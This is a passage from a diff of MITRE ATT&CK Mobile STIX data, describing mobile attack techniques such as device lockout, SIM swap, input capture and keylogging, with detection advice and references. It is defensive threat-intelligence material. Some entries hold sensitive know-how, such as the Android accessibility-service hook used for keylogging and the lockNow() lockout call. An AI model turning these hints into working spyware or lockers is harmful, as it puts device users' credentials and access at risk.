"2017-10-25T14:48:17.886Z", + "x_mitre_version": "2.0", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1446", + "url": "https://attack.mitre.org/techniques/T1446" + }, + { + "source_name": "Xiao-KeyRaider", + "url": "http://researchcenter.paloaltonetworks.com/2015/08/keyraider-ios-malware-steals-over-225000-apple-accounts-to-create-free-app-utopia/", + "description": "Claud Xiao. (2015, August 30). KeyRaider: iOS Malware Steals Over 225,000 Apple Accounts to Create Free App Utopia. Retrieved December 12, 2016." + }, + { + "source_name": "Android resetPassword", + "url": "https://developer.android.com/reference/android/app/admin/DevicePolicyManager.html#resetPassword(java.lang.String,%20int)", + "description": "Google. (n.d.). DevicePolicyManager. Retrieved October 1, 2019." + }, + { + "url": "https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-28.html", + "source_name": "NIST Mobile Threat Catalogue", + "external_id": "APP-28" + } + ], + "x_mitre_deprecated": false, + "revoked": true, + "description": "An adversary may seek to lock the legitimate user out of the device, for example to inhibit user interaction or to obtain a ransom payment.\n\nOn Android versions prior to 7, apps can abuse Device Administrator access to reset the device lock passcode to prevent the user from unlocking the device. After Android 7, only device or profile owners (e.g. MDMs) can reset the device’s passcode.(Citation: Android resetPassword)\n\nOn iOS devices, this technique does not work because mobile device management servers can only remove the screen lock passcode, they cannot set a new passcode. However, on jailbroken devices, malware has been discovered that can lock the user out of the device.(Citation: Xiao-KeyRaider)", + "modified": "2022-04-01T18:49:51.039Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Device Lockout", + "x_mitre_detection": "On Android, users can review which applications have device administrator access in the device settings, and revoke permission where appropriate.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "impact" + }, + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_is_subtechnique": false, + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-03-20T18:58:20.113Z", + "name": "Remote Device Management Services", + "description": "An adversary may use access to cloud services (e.g. Google's Android Device Manager or Apple iCloud's Find my iPhone) or to an enterprise mobility management (EMM)/mobile device management (MDM) server console to track the location of mobile devices managed by the service.(Citation: Krebs-Location) ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "collection" + }, + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "discovery" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Google sends a notification to the device when Android Device Manager is used to locate it. Additionally, Google provides the ability for users to view their general account activity and alerts users when their credentials have been used on a new device. Apple iCloud also provides notifications to users of account activity such as when credentials have been used. ", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_version": "1.1", + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--9ef05e3d-52db-4c12-be4f-519214bbe91f", + "created": "2022-04-05T19:37:15.984Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1430/001", + "external_id": "T1430.001" + }, + { + "source_name": "Krebs-Location", + "description": "Brian Krebs. (2018, May 17). Tracking Firm LocationSmart Leaked Location Data for Customers of All Major U.S. Mobile Carriers Without Consent in Real Time Via Its Web Site. Retrieved November 8, 2018.", + "url": "https://krebsonsecurity.com/2018/05/tracking-firm-locationsmart-leaked-location-data-for-customers-of-all-major-u-s-mobile-carriers-in-real-time-via-its-web-site/" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/ecosystem-threats/ECO-5.html", + "external_id": "ECO-5" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/emm-threats/EMM-7.html", + "external_id": "EMM-7" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "id": "attack-pattern--a0464539-e1b7-4455-a355-12495987c300", + "created": "2017-10-25T14:48:13.625Z", + "x_mitre_version": "1.1", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1427", + "url": "https://attack.mitre.org/techniques/T1427" + }, + { + "source_name": "ArsTechnica-PoisonTap", + "url": "http://arstechnica.com/security/2016/11/meet-poisontap-the-5-tool-that-ransacks-password-protected-computers/", + "description": "Dan Goodin. (2016, November 16). Meet PoisonTap, the $5 tool that ransacks password-protected computers. Retrieved December 22, 2016." + }, + { + "source_name": "Wang-ExploitingUSB", + "url": "http://dl.acm.org/citation.cfm?id=1920314", + "description": "Z. Wang and A. Stavrou. (2010, December 6-10). Exploiting smart-phone USB connectivity for fun and profit. Retrieved December 22, 2016." + }, + { + "url": "https://pages.nist.gov/mobile-threat-catalogue/physical-threats/PHY-2.html", + "source_name": "NIST Mobile Threat Catalogue", + "external_id": "PHY-2" + } + ], + "x_mitre_deprecated": true, + "revoked": false, + "description": "With escalated privileges, an adversary could program the mobile device to impersonate USB devices such as input devices (keyboard and mouse), storage devices, and/or networking devices in order to attack a physically connected PC(Citation: Wang-ExploitingUSB)(Citation: ArsTechnica-PoisonTap) This technique has been demonstrated on Android. We are unaware of any demonstrations on iOS.", + "modified": "2022-04-06T15:39:14.695Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Attack PC via USB Connection", + "x_mitre_detection": "", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "lateral-movement" + } + ], + "x_mitre_is_subtechnique": false, + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "x_mitre_domains": [ + "mobile-attack" + ], + "id": "attack-pattern--a21a6a79-f9a1-4c87-aed9-ba2d79536881", + "type": "attack-pattern", + "created": "2017-10-25T14:48:05.928Z", + "revoked": true, + "external_references": [ + { + "source_name": "mitre-mobile-attack", + "url": "https://attack.mitre.org/techniques/T1441", + "external_id": "T1441" + } + ], + "modified": "2018-10-17T01:05:10.700Z", + "name": "Stolen Developer Credentials or Signing Keys", + "x_mitre_version": "1.0", + "x_mitre_is_subtechnique": false + }, + { + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "id": "attack-pattern--a5de0540-73e7-4c67-96da-4143afedc7ed", + "created": "2017-10-25T14:48:22.296Z", + "x_mitre_version": "1.1", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1467", + "url": "https://attack.mitre.org/techniques/T1467" + }, + { + "source_name": "Computerworld-Femtocell", + "url": "http://www.computerworld.com/article/2484538/cybercrime-hacking/researchers-exploit-cellular-tech-flaws-to-intercept-phone-calls.html", + "description": "Jaikumar Vijayan. (2013, August 1). Researchers exploit cellular tech flaws to intercept phone calls. Retrieved December 24, 2016." + }, + { + "url": "https://pages.nist.gov/mobile-threat-catalogue/cellular-threats/CEL-7.html", + "source_name": "NIST Mobile Threat Catalogue", + "external_id": "CEL-7" + } + ], + "x_mitre_deprecated": false, + "revoked": true, + "description": "An adversary could set up a rogue cellular base station and then use it to eavesdrop on or manipulate cellular device communication. A compromised cellular femtocell could be used to carry out this technique(Citation: Computerworld-Femtocell).", + "modified": "2022-04-06T15:52:41.578Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Rogue Cellular Base Station", + "x_mitre_detection": "", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "network-effects" + } + ], + "x_mitre_is_subtechnique": false, + "x_mitre_tactic_type": [ + "Without Adversary Device Access" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_contributors": [ + "Karim Hasanen, @_karimhasanen" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "id": "attack-pattern--a64a820a-cb21-471f-920c-506a2ff04fa5", + "created": "2017-10-25T14:48:20.329Z", + "x_mitre_version": "1.2", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1451", + "url": "https://attack.mitre.org/techniques/T1451" + }, + { + "source_name": "Betanews-Simswap", + "url": "http://betanews.com/2016/02/12/everything-you-need-to-know-about-sim-swap-scams/", + "description": "Alex Cambell. (2016, February 12). Everything you need to know about SIM swap scams. Retrieved December 12, 2016." + }, + { + "source_name": "Krebs-SimSwap", + "url": "https://krebsonsecurity.com/2018/05/t-mobile-employee-made-unauthorized-sim-swap-to-steal-instagram-account/", + "description": "Brian Krebs. (2018, May 18). T-Mobile Employee Made Unauthorized ‘SIM Swap’ to Steal Instagram Account. Retrieved November 8, 2018." + }, + { + "source_name": "TechCrunch-SimSwap", + "url": "https://techcrunch.com/2017/08/23/i-was-hacked/", + "description": "John Biggs. (2017, August 23). I was hacked. Retrieved November 8, 2018." + }, + { + "source_name": "Motherboard-Simswap2", + "url": "https://motherboard.vice.com/en_us/article/3ky5a5/criminals-recruit-telecom-employees-sim-swapping-port-out-scam", + "description": "Lorenzo Franceschi-Bicchierai. (2018, August 3). How Criminals Recruit Telecom Employees to Help Them Hijack SIM Cards. Retrieved August 11, 2018." + }, + { + "source_name": "Motherboard-Simswap1", + "url": "https://motherboard.vice.com/en_us/article/vbqax3/hackers-sim-swapping-steal-phone-numbers-instagram-bitcoin", + "description": "Lorenzo Franceschi-Bicchierai. (2018, July 17). The SIM Hijackers. Retrieved August 11, 2018." + }, + { + "source_name": "Guardian-Simswap", + "url": "https://www.theguardian.com/money/2016/apr/16/sim-swap-fraud-mobile-banking-fraudsters", + "description": "Miles Brignall. (2016, April 16). Sim-swap fraud claims another mobile banking victim. Retrieved December 12, 2016." + }, + { + "source_name": "NYGov-Simswap", + "url": "http://www.dos.ny.gov/consumerprotection/scams/att-sim.html", + "description": "New York Department of State. (2016, February 12). AT&T SIM-Card Switch Scam. Retrieved August 23, 2016." + }, + { + "url": "https://pages.nist.gov/mobile-threat-catalogue/stack-threats/STA-22.html", + "source_name": "NIST Mobile Threat Catalogue", + "external_id": "STA-22" + } + ], + "x_mitre_deprecated": true, + "revoked": false, + "description": "An adversary could convince the mobile network operator (e.g. through social networking, forged identification, or insider attacks performed by trusted employees) to issue a new SIM card and associate it with an existing phone number and account.(Citation: NYGov-Simswap)(Citation: Motherboard-Simswap2) The adversary could then obtain SMS messages or hijack phone calls intended for someone else.(Citation: Betanews-Simswap)\n\nOne use case is intercepting authentication messages or phone calls to obtain illicit access to online banking or other online accounts, as many online services allow account password resets by sending an authentication code over SMS to a phone number associated with the account.(Citation: Guardian-Simswap)(Citation: Motherboard-Simswap1)(Citation: Krebs-SimSwap)(Citation: TechCrunch-SimSwap)", + "modified": "2022-04-06T15:53:54.872Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "SIM Card Swap", + "x_mitre_detection": "", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "network-effects" + } + ], + "x_mitre_is_subtechnique": false, + "x_mitre_tactic_type": [ + "Without Adversary Device Access" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-03-20T18:44:36.145Z", + "name": "Input Capture", + "description": "Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal device usage, users often provide credentials to various locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. [Keylogging](https://attack.mitre.org/techniques/T1417/001)) or rely on deceiving the user into providing input into what they believe to be a genuine application prompt (e.g. [GUI Input Capture](https://attack.mitre.org/techniques/T1417/002)).", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "collection" + }, + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "credential-access" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Application vetting services can look for applications requesting the permissions granting access to accessibility services or application overlay. Users can view and manage installed third-party keyboards.", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_version": "2.3", + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--a8c31121-852b-46bd-9ba4-674ae5afe7ad", + "created": "2017-10-25T14:48:27.660Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1417", + "external_id": "T1417" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-31.html", + "external_id": "APP-31" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/authentication-threats/AUT-13.html", + "external_id": "AUT-13" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-03-20T18:57:17.144Z", + "name": "Generate Traffic from Victim", + "description": "Adversaries may generate outbound traffic from devices. This is typically performed to manipulate external outcomes, such as to achieve carrier billing fraud or to manipulate app store rankings or ratings. Outbound traffic is typically generated as SMS messages or general web traffic, but may take other forms as well.\n\nIf done via SMS messages, Android apps must hold the `SEND_SMS` permission. Additionally, sending an SMS message requires user consent if the recipient is a premium number. Applications cannot send SMS messages on iOS", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "impact" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "On Android, users can review which applications can use premium SMS features in the “Special access” page within application settings. Application vetting services can detect when applications request the `SEND_SMS` permission, which should be infrequently used.", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_version": "1.1", + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--a8e971b8-8dc7-4514-8249-ae95427ec467", + "created": "2022-04-06T13:55:14.390Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1643", + "external_id": "T1643" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-16.html", + "external_id": "APP-16" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-03-20T18:18:29.556Z", + "name": "Disguise Root/Jailbreak Indicators", + "description": "An adversary could use knowledge of the techniques used by security software to evade detection.(Citation: Brodie)(Citation: Tan) For example, some mobile security products perform compromised device detection by searching for particular artifacts such as an installed \"su\" binary, but that check could be evaded by naming the binary something else. Similarly, polymorphic code techniques could be used to evade signature-based detection.(Citation: Rastogi)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Mobile security products can use attestation to detect compromised devices.", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_version": "1.1", + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--a91262d5-b9ff-463f-b8d2-12e4ea1eb3c9", + "created": "2022-04-08T16:29:30.087Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1630/003", + "external_id": "T1630.003" + }, + { + "source_name": "Brodie", + "description": "Daniel Brodie. (2016). Practical Attacks against Mobile Device Management (MDM). Retrieved December 21, 2016.", + "url": "https://media.blackhat.com/eu-13/briefings/Brodie/bh-eu-13-lacoon-attacks-mdm-brodie-wp.pdf" + }, + { + "source_name": "Rastogi", + "description": "Vaibhav Rastogi, Yan Chen, and Xuxian Jiang. (2013, May). DroidChameleon: Evaluating Android Anti-malware against Transformation Attacks. Retrieved December 9, 2016.", + "url": "http://pages.cs.wisc.edu/~vrastogi/static/papers/rcj13b.pdf" + }, + { + "source_name": "Tan", + "description": "Vincent Tan. (2016, August). BAD FOR ENTERPRISE: ATTACKING BYOD ENTERPRISE MOBILE SECURITY SOLUTIONS. Retrieved February 4, 2017.", + "url": "http://www.blackhat.com/us-16/briefings.html#bad-for-enterprise-attacking-byod-enterprise-mobile-security-solutions" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/emm-threats/EMM-5.html", + "external_id": "EMM-5" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_contributors": [ + "Alex Hinchliffe, Palo Alto Networks" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "id": "attack-pattern--a93ccb8f-3996-42e2-b7c7-bb599d4e205f", + "created": "2017-10-25T14:48:35.247Z", + "x_mitre_version": "2.1", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1444", + "url": "https://attack.mitre.org/techniques/T1444" + }, + { + "source_name": "Palo Alto HenBox", + "url": "https://unit42.paloaltonetworks.com/unit42-henbox-chickens-come-home-roost/", + "description": "A. Hinchliffe, M. Harbison, J. Miller-Osborn, et al. (2018, March 13). HenBox: The Chickens Come Home to Roost. Retrieved September 9, 2019." + }, + { + "source_name": "Zhou", + "url": "http://ieeexplore.ieee.org/document/6234407", + "description": "Yajin Zhou and Xuxian Jiang. (2012, May). Dissecting Android Malware: Characterization and Evolution. Retrieved December 9, 2016." + }, + { + "url": "https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-31.html", + "source_name": "NIST Mobile Threat Catalogue", + "external_id": "APP-31" + }, + { + "url": "https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-14.html", + "source_name": "NIST Mobile Threat Catalogue", + "external_id": "APP-14" + } + ], + "x_mitre_deprecated": true, + "revoked": false, + "description": "An adversary could distribute developed malware by masquerading the malware as a legitimate application. This can be done in two different ways: by embedding the malware in a legitimate application, or by pretending to be a legitimate application.\n\nEmbedding the malware in a legitimate application is done by downloading the application, disassembling it, adding the malicious code, and then re-assembling it.(Citation: Zhou) The app would appear to be the original app, but would contain additional malicious functionality. The adversary could then publish the malicious application to app stores or use another delivery method.\n\nPretending to be a legitimate application relies heavily on lack of scrutinization by the user. Typically, a malicious app pretending to be a legitimate one will have many similar details as the legitimate one, such as name, icon, and description.(Citation: Palo Alto HenBox)\n\nMalicious applications may also masquerade as legitimate applications when requesting access to the accessibility service in order to appear as legitimate to the user, increasing the likelihood that the access will be granted.", + "modified": "2022-04-06T15:45:52.558Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Masquerade as Legitimate Application", + "x_mitre_detection": "Users can detect malicious applications by watching for nuances that could indicate the application is not the intended one when it is being installed.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "initial-access" + }, + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_is_subtechnique": false, + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "x_mitre_domains": [ + "mobile-attack" + ], + "id": "attack-pattern--a9cab8f6-4c94-4c9b-9e7d-9d863ff53431", + "type": "attack-pattern", + "created": "2017-10-25T14:48:19.682Z", + "revoked": true, + "external_references": [ + { + "source_name": "mitre-mobile-attack", + "url": "https://attack.mitre.org/techniques/T1457", + "external_id": "T1457" + } + ], + "modified": "2018-10-17T01:05:10.703Z", + "name": "Malicious Media Content", + "x_mitre_version": "1.0", + "x_mitre_is_subtechnique": false + }, + { + "modified": "2023-03-16T18:28:28.234Z", + "name": "Calendar Entries", + "description": "Adversaries may utilize standard operating system APIs to gather calendar entry data. On Android, this can be accomplished using the Calendar Content Provider. On iOS, this can be accomplished using the `EventKit` framework. \n\n \n\nIf the device has been jailbroken or rooted, an adversary may be able to access [Calendar Entries](https://attack.mitre.org/techniques/T1636/001) without the user’s knowledge or approval. ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "collection" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "On both Android and iOS, the user can manage which applications have permission to access calendar information through the device settings screen, revoke the permission if necessary. Application vetting services could look for `android.permission.READ_CALENDAR` or `android.permission.WRITE_CALENDAR` in an Android application’s manifest, or `NSCalendarsUsageDescription` in an iOS application’s `Info.plist` file. Most applications do not need calendar access, so extra scrutiny could be applied to those that request it. ", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_version": "1.1", + "type": "attack-pattern", + "id": "attack-pattern--a9fa0d30-a8ff-45bf-922e-7720da0b7922", + "created": "2022-04-01T12:48:27.021Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1636/001", + "external_id": "T1636.001" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-13.html", + "external_id": "APP-13" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-03-20T18:52:24.758Z", + "name": "File Deletion", + "description": "Adversaries may wipe a device or delete individual files in order to manipulate external outcomes or hide activity. An application must have administrator access to fully wipe the device, while individual files may not require special permissions to delete depending on their storage location.(Citation: Android DevicePolicyManager 2019) \n\nStored data could include a variety of file formats, such as Office files, databases, stored emails, and custom file formats. The impact file deletion will have depends on the type of data as well as the goals and objectives of the adversary, but can include deleting update files to evade detection or deleting attacker-specified files for impact.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Mobile security products can detect which applications can request device administrator permissions. Users can view applications with administrator access through the device settings, and may also notice if user data is inexplicably missing. Application vetting services could be extra scrutinous of applications that request device administrator permissions.", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_version": "1.1", + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--ab7400b7-3476-4776-9545-ef3fa373de63", + "created": "2022-03-30T19:36:09.691Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1630/002", + "external_id": "T1630.002" + }, + { + "source_name": "Android DevicePolicyManager 2019", + "description": "Android Developers. (n.d.). DevicePolicyManager. Retrieved September 22, 2019.", + "url": "https://developer.android.com/reference/android/app/admin/DevicePolicyManager.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-03-20T18:39:10.201Z", + "name": "Device Lockout", + "description": "An adversary may seek to inhibit user interaction by locking the legitimate user out of the device. This is typically accomplished by requesting device administrator permissions and then locking the screen using `DevicePolicyManager.lockNow()`. Other novel techniques for locking the user out of the device have been observed, such as showing a persistent overlay, using carefully crafted “call” notification screens, and locking HTML pages in the foreground. These techniques can be very difficult to get around, and typically require booting the device into safe mode to uninstall the malware.(Citation: Microsoft MalLockerB)(Citation: Talos GPlayed)(Citation: securelist rotexy 2018)\n\nPrior to Android 7, device administrators were able to reset the device lock passcode to prevent the user from unlocking the device. The release of Android 7 introduced updates that only allow device or profile owners (e.g. MDMs) to reset the device’s passcode.(Citation: Android resetPassword)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Users can view a list of device administrators in device settings and revoke permission where appropriate. Applications that request device administrator permissions should be scrutinized further for malicious behavior.", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_version": "1.1", + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--acf8fd2a-dc98-43b4-8d37-64e10728e591", + "created": "2022-04-01T18:49:03.892Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1629/002", + "external_id": "T1629.002" + }, + { + "source_name": "Microsoft MalLockerB", + "description": "D. Venkatesan. (2020, October 8). Sophisticated new Android malware marks the latest evolution of mobile ransomware . Retrieved October 29, 2020.", + "url": "https://www.microsoft.com/security/blog/2020/10/08/sophisticated-new-android-malware-marks-the-latest-evolution-of-mobile-ransomware/" + }, + { + "source_name": "Android resetPassword", + "description": "Google. (n.d.). DevicePolicyManager. Retrieved October 1, 2019.", + "url": "https://developer.android.com/reference/android/app/admin/DevicePolicyManager.html#resetPassword(java.lang.String,%20int)" + }, + { + "source_name": "securelist rotexy 2018", + "description": "T. Shishkova, L. Pikman. (2018, November 22). The Rotexy mobile Trojan – banker and ransomware. Retrieved September 23, 2019.", + "url": "https://securelist.com/the-rotexy-mobile-trojan-banker-and-ransomware/88893/" + }, + { + "source_name": "Talos GPlayed", + "description": "V. Ventura. (2018, October 11). GPlayed Trojan - .Net playing with Google Market . Retrieved November 24, 2020.", + "url": "https://blog.talosintelligence.com/2018/10/gplayedtrojan.html" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-22.html", + "external_id": "APP-22" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-03-20T18:48:39.936Z", + "name": "Keylogging", + "description": "Adversaries may log user keystrokes to intercept credentials or other information from the user as the user types them.\n\nSome methods of keylogging include:\n\n* Masquerading as a legitimate third-party keyboard to record user keystrokes.(Citation: Zeltser-Keyboard) On both Android and iOS, users must explicitly authorize the use of third-party keyboard apps. Users should be advised to use extreme caution before granting this authorization when it is requested.\n* Abusing accessibility features. On Android, adversaries may abuse accessibility features to record keystrokes by registering an `AccessibilityService` class, overriding the `onAccessibilityEvent` method, and listening for the `AccessibilityEvent.TYPE_VIEW_TEXT_CHANGED` event type. The event object passed into the function will contain the data that the user typed. \n*Additional methods of keylogging may be possible if root access is available. \n", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "collection" + }, + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "credential-access" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "On Android, users can view and manage which applications have third-party keyboard access through the device settings in System -> Languages & input -> Virtual keyboard. On iOS, users can view and manage which applications have third-party keyboard access through the device settings in General -> Keyboard. 